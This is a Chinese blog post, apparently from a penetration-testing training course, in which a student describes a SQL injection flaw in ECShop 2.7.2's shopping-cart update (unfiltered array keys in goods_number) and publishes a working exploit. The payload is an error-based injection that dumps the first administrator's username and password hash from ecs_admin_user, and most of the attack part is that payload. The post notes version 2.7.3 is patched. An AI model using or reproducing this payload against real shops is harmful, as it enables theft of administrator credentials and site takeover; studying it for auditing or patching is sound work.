学员渗透录十五 ecshop2.7.2最新通杀注入漏洞附(exp)

暗月博客 2019年11月21日16:54:28评论871 views字数 1020阅读3分24秒阅读模式
摘要

作者:穿越时空 AD:学渗透找暗月,暗月 欢迎你的加入 这篇文章是学员穿越时空所写,ecshop注入通杀,在截稿前ecshop2.7.3已经修补了。

 

学员渗透录十五 ecshop2.7.2通杀注入漏洞

作者:穿越时空

AD:学渗透找暗月,暗月欢迎你的加入

这篇文章是学员穿越时空所写,ecshop注入通杀,在截稿前ecshop2.7.3已经修补了。

但是2.7.2还没有修补。

正文:

跟暗月大大学习代码审计有段日子,代码审计有了很大的提高,感谢暗月。

ecshop很早之前就更新到2.7.3, 围观了大部分代码,说真的漏洞,前台通杀漏洞真是挖不到了,后台一堆渣渣漏洞,没意思。

那我们将目光投向ecshop 2.7.2把

学员渗透录十五 ecshop2.7.2最新通杀注入漏洞附(exp)

$_POST['goods_number'] 没有过滤。

跟踪flow_update_cart函数

学员渗透录十五 ecshop2.7.2最新通杀注入漏洞附(exp)

遍历数据使用$key带入查询。 在此之前还有一个检查。

   if ($val <= 0 && !is_numeric($key))         {             continue;         }

这里应该是&&写成||这样才对的,不知道为什么。这里可以不用管了。

虽然init.php全局文件对value进行过滤,但是不影响。我们这里是可控的是$key

if (!get_magic_quotes_gpc()) {     if (!empty($_GET))     {         $_GET  = addslashes_deep($_GET);     }     if (!empty($_POST))     {         $_POST = addslashes_deep($_POST);     }      $_COOKIE   = addslashes_deep($_COOKIE);     $_REQUEST  = addslashes_deep($_REQUEST); } 

搞个商品更新购物车。提交可以看到出错了。

学员渗透录十五 ecshop2.7.2最新通杀注入漏洞附(exp)

exp:

goods_number%5B48' and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#%5D=1&goods_number%5B47%5D=1&submit=%E6%9B%B4%E6%96%B0%E8%B4%AD%E7%89%A9%E8%BD%A6&step=update_cart

学员渗透录十五 ecshop2.7.2最新通杀注入漏洞附(exp)

这个漏洞以前好像有人发过,不管了 反正是学习的。

暗月:果断给力 ,可惜2.7.3最新的已经修补了。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日16:54:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   学员渗透录十五 ecshop2.7.2最新通杀注入漏洞附(exp)http://cn-sec.com/archives/71505.html

发表评论

匿名网友 填写信息